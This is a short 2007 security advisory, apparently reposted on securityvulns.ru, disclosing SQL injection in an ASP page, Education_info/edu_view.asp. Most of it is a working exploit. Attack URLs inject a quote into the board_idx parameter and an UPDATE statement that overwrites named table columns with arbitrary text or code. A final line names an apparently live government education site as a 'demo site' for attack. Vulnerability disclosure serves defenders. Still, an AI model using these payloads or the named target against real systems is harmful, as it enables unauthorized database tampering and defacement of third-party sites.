Security Advisory: Education_info/edu_view.asp sql injection

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  CA.View/view-law.
asp/view-info.asp sql injection
  Shoutbox 1.0 Remote Command Execution Vulnerability
  Coppermine Photo Gallery (yabbse.inc.
php) Remote File Inclusion Vulnerability
  [Aria-Security.net] SAS Hotel Management System SQL Injection

From: okan alp <codexploder_(at)_hotmail.com>
Date: 10.08.2007
Subject: Education_info/edu_view.asp sql injection

Education_info/edu_view.asp sql injection

Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
ccc

1-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=(sql methot)

1-) example.com/info/edu_view.asp?kooboon=&gotopage=&board_idx=(sql methot)

ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
ccc

2-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=1'

2-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

#tbl    : du_project_2006
#column : edu_area,edu_name

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxx

demo site   : http://edu.cheoingu.go.kr/info/edu_view.asp?kooboon=&gotopage=&board_idx=
174